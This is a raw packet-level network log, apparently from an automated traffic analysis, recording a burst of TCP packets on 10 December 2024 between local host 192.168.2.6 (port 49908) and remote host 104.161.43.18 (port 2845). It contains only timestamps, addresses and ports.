                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.031631947 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.031702995 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.032376051 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.032816887 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.032896996 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.033471107 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.033632994 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.033735037 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.034663916 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.034677029 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.034734011 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.035516024 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.035594940 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.035665035 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.036552906 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.036869049 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.037262917 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.037635088 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.037673950 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.037988901 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.038575888 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.038702965 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.039611101 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.039716959 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.039757013 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.039854050 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.040608883 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.040731907 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.040895939 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.041827917 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.041910887 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.042742968 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.042785883 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.042836905 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.042872906 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.043756962 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.043946028 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.043989897 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.044819117 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.044832945 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.044879913 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.045938015 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.045989037 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.046031952 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.046782970 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.046962976 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.047086000 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.047815084 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.047945976 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.048346996 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.048861980 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.049218893 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.049262047 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.050071955 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.050085068 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.050122976 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.050909996 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.051054955 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.051090002 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.051991940 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.052076101 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.052112103 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.052932978 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.053024054 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.053531885 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.053963900 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.054189920 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.055066109 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.055090904 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.055131912 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.055161953 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.056121111 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.056189060 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.056222916 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.057117939 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.057285070 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.057387114 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.058109999 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.058255911 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.059180975 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.059216022 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.059294939 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.059598923 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.060172081 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.060303926 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.060412884 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.061187983 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.061265945 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.061301947 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.062398911 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.062412024 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.062500000 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.063333988 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.063455105 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.063488007 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.064338923 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.064388037 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.064527988 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.065279961 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.065498114 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.066337109 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.066382885 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.066457987 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.066492081 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.067359924 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.067517996 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.067562103 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.068404913 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.068492889 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.068664074 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.069077015 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.069226027 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.069261074 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.069704056 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.069834948 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.070210934 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.070744991 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.070883036 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.070919991 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.072010994 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.072024107 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.072057009 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.079085112 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.079185009 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.210561991 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.210593939 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.210647106 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.210874081 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.211034060 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.211075068 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.211987019 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.212091923 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.212135077 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.213048935 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.224607944 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.224658966 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.224694014 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.224946022 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.224992990 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.225092888 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.226016998 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.226059914 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.226155043 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.227029085 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.227072954 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.227114916 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.228069067 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.228131056 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.228161097 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.229166031 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.229212046 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.229343891 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.230078936 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.230127096 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.230159998 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.231282949 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.231302977 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.231328964 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.232347965 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.232359886 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.232388020 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.233372927 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.233417034 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.233632088 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.234266043 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.234313965 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.234428883 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.235244989 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.235287905 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.235347033 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.236428022 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.236469030 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.236514091 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.237411022 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.237423897 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.237452984 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.238306046 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.238421917 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.238471985 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.239345074 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.239387989 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.239449978 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.240401983 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.240443945 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.240452051 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.241427898 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.241467953 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.241513014 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.242496014 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.242537022 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.242679119 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.243522882 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.243570089 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.243670940 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.244584084 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.244625092 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.244695902 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.245805025 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.245815992 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.245908976 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.247263908 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.247282982 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.247304916 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.248013020 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.248053074 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.248136997 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.248775005 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.248815060 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.248815060 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.249727964 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.249772072 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.250119925 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.250765085 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.250895023 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.250895977 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.251825094 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.251904011 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.252033949 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.252779007 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.252832890 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.252887964 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.253834009 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.253880978 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.253950119 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.255022049 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.255033970 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.255073071 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.255870104 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.255996943 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.256042957 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.256926060 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.257010937 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.257019043 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.258156061 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.258168936 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.258198023 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.259042978 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.259077072 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.259094000 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.259936094 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.259983063 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.260050058 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.260973930 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.261025906 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.261121035 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.262002945 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.262042046 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.262042046 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.263159990 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.263171911 CET284549908104.161.43.18192.168.2.6
